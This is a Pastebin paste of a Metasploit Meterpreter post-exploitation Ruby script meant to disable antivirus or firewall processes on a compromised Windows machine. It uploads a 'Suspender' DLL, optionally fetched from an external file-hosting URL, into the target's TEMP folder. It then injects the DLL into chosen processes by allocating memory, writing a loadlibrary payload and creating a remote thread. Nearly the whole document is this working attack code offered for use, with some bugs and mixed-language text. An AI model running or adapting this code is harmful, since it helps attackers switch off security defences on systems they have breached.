Guest User

suspend_resilientprocess.rb

a guest
Aug 23rd, 2011
205
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #
  2. # This Script use the Suspender dll's Library to suspend a windows process, ideally a resilient process like an AV or Stateless Firewall
  3. # To do this, the script uploads the library in the target system and after open the resilient process to suspend, once opened the target process,
  4. # this script generates a payload of type "windows/loadlibrary", after this, will try to allocate a memory space to load the library in the process,
  5. # write the allocated memory into the process and finally create a thread to execute the dll.
  6. # When pass 'n' seconds, the target process will be suspended and his process and threads childs, will be suspended too.
  7. # the 'n' seconds corresponds to the value specified in the dll's filename,
  8. # for example: Suspender10.dll will suspend the target process and his childs in 10 seconds. In the Script
  9. #
  10. # Version 1.0
  11. # written by Adastra.
  12. #
  13. #Variables del script
  14. require 'net/http'
  15. require 'uri'
  16.  
  17. session = client
  18. wininfo = client.sys.config.sysinfo
  19.  
  20.  
  21. # Argumentos de la función
  22. @@exec_opts = Rex::Parser::Arguments.new(
  23.     "-h" => [ false,"Help Menu."],
  24.     "-p" => [ true,"List of processes to suspend in the remote machine, each separated by ','." ],
  25.     "-s" => [ true,"Number of seconds before suspend the process(es)." ],
  26.     "-f" => [ true,"Specify the path of Suspender.dll in the local machine (attacker) to upload in the remote machine." ],
  27.     "-d" => [ true,"Download from a website in Internet. If you don't use this option neither '-f' option the default value will used to download the library from internet"]
  28. )
  29.  
  30. processes = []
  31. file_suspender_dll = nil
  32. url_suspender_dll = 'http://www.fileserve.com/file/kBSgbw4/Suspender.dll'
  33. downloadMode = true
  34. seconds_to_suspend = nil
  35.  
  36. def usage
  37.     print_line("ScriptThis Script use the Suspender dll's Library to suspend a windows process, ideally a resilient process like an AV or Stateless Firewall. ")
  38.     print_line("Para do this, the script uploads the library in the target system and after open the resilient process to suspend, once opened the target process, ")
  39.     print_line("this script generates a payload of type 'windows/loadlibrary', after this, will try to allocate a memory space to load the library in the process, ")
  40.     print_line("the allocated memory into the process and finally create a thread to execute the dll. ")
  41.     print_line("When pass 'n' seconds, the target process will be suspended and his process and threads childs, will be suspended too. ")
  42.     print_line("the 'n' seconds corresponds to the value specified in the dll's filename,  ")
  43.     print_line("for example: Suspender10.dll will suspend the target process and his childs in 10 seconds. In the Script  ")
  44.  
  45.     puts @@exec_opts.usage
  46.     print_line("Example Usage:")
  47.     print_line("run suspendProcess -p process1[,process2,processN] -f PATH_OF_SUSPENDER_DLL")
  48.     print_line("run suspendProcess -p process1[,process2,processN] -d URL_OF_SUSPENDER_DLL")
  49.     raise Rex::Script::Completed
  50. end
  51.  
  52. def uploadFile(client,file,download,url,seconds)
  53.     uploadedFile=''
  54.     if download
  55.         print_status("Trying to download Suspender from #{url}")
  56.        
  57.         suspender_dll = Net::HTTP.get URI.parse(url)
  58.         file = File.join(Msf::Config.data_directory, "Suspender#{seconds}.dll")
  59.         File.open(file, "wb") { |fd| fd.write(file) }
  60.         print_status("Suspender10.dll has been downloaded to #{file} (local machine). Please remove manually after use or keep for reuse.")
  61.     end
  62.    
  63.     if not ::File.exists?(file)
  64.             raise "File to Upload does not exists!"
  65.         else
  66.             location = client.fs.file.expand_path("%TEMP%")
  67.             fullPath = "#{location}\\Suspender#{seconds}.dll"
  68.             begin
  69.                 print_status("Uploading #{file}....")
  70.                 client.fs.file.upload_file(fullPath, file)
  71.                 print_status("successfully uploaded to #{fullPath}!")
  72.                 uploadedFile = fullPath
  73.                 rescue ::Exception => e
  74.                     print_error("Raised a exception uploading the DLL in the remote machine Maybe the library has been uploaded before... #{e}")
  75.             end
  76.     end
  77.     uploadedFile;
  78. end
  79.  
  80. def loadProcceses(session,processes_to_suspend,pathtosuspend)
  81.     ret=''
  82.    
  83.     print_status "Path Library: #{pathtosuspend}"
  84.     processes_to_suspend.each do |process|
  85.         begin
  86.             print_status "Trying to suspend the process with PID: #{process}"
  87.             payload = client.framework.payloads.create("windows/loadlibrary")
  88.             payload.datastore['DLL'] = pathtosuspend
  89.             payload.datastore['EXITFUNC'] = 'thread'
  90.             raw_payload = payload.generate
  91.             targetprocess = client.sys.process.open(process.to_i, PROCESS_ALL_ACCESS)
  92.             memory = targetprocess.memory.allocate(raw_payload.length + (raw_payload.length % 1024))
  93.             targetprocess.memory.write(memory, raw_payload)
  94.             targetprocess.thread.create(memory, 0)
  95.             rescue ::Exception => e
  96.                 print_error("Error allocating memory in the target process with PID #{process} the error is: #{e}")
  97.                 print_error("following with the next process in the list");
  98.                 ret = "#{ret} Error allocating memory in the target process with PID #{process}\n"
  99.         end
  100.         ret = "#{ret} The signal to suspend the #{process} has been submitted\n"
  101.     end
  102.     ret;
  103. end
  104.  
  105. #Main Function
  106. @@exec_opts.parse(args) {
  107. |opt, idx, val|
  108.  
  109.     case opt
  110.     when "-p"
  111.         processes.concat(val.split(","))
  112.     when "-d"
  113.         url_suspender_dll = val
  114.         print_status "The Suspender library will be downloaded from Internet, you need internet connection to make this work..."
  115.         downloadMode=true;
  116.     when "-f"
  117.         file_suspender_dll = val
  118.         print_status "File to upload: #{file_suspender_dll} "
  119.         if not ::File.exists?(file_suspender_dll)
  120.             print_error("file not found/accessible!")
  121.             usage
  122.         end
  123.         downloadMode=false;
  124.  
  125.     when "-s"
  126.         seconds_to_suspend = val
  127.         if seconds_to_suspend.to_i <= 0
  128.             print_error("Number of seconds to suspend the process must be greater than zero!")
  129.         end
  130.         print_status "Setting the number of seconds to suspend the process at #{seconds_to_suspend}"
  131.     when "-h"
  132.         usage
  133.     else
  134.         print_error "Invalid Option: #{opt}"
  135.         usage
  136.     end
  137. }
  138.  
  139. if seconds_to_suspend == nil
  140.     print_status "Setting the number of seconds to default (10 seconds) if you want to change that, you should use the '-s' option"
  141.     seconds_to_suspend = "10"
  142. end
  143. file_suspender_dll = uploadFile(client, file_suspender_dll,downloadMode,url_suspender_dll,seconds_to_suspend) #if file_suspender_dll
  144. print_status loadProcceses(session,processes,file_suspender_dll)
RAW Paste Data